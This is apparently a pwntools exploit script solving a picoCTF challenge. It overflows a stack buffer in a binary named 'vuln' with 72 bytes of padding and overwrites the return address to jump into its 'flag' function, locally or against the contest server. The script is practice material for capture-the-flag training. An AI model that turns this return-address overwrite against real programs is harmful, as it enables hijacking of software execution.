34 lines
716 B
Python
Executable File
34 lines
716 B
Python
Executable File
#!/usr/bin/env nix-shell
|
|
#!nix-shell -p python3 -i python3 python3Packages.pwntools
|
|
|
|
from pwn import *
|
|
|
|
exe = ELF("./vuln")
|
|
|
|
context.binary = exe
|
|
|
|
ADDR, PORT, *_ = "saturn.picoctf.net 63864".split()
|
|
|
|
def conn():
|
|
if args.REMOTE:
|
|
r = remote(ADDR, PORT)
|
|
else:
|
|
r = process([exe.path])
|
|
|
|
return r
|
|
|
|
def main():
|
|
r = conn()
|
|
|
|
print(r.recvuntil(b"Welcome to 64-bit. Give me a string that gets you the flag:"))
|
|
offset = 72 # found with pwndbg
|
|
print(f"flag: {hex(exe.sym.flag)}")
|
|
print(p64(exe.sym.flag))
|
|
payload = b'A' * offset + p64(exe.sym.flag + 5) # skip one instruction for some reason...
|
|
r.sendline(payload)
|
|
print(r.recvall())
|
|
r.close()
|
|
|
|
if __name__ == "__main__":
|
|
main()
|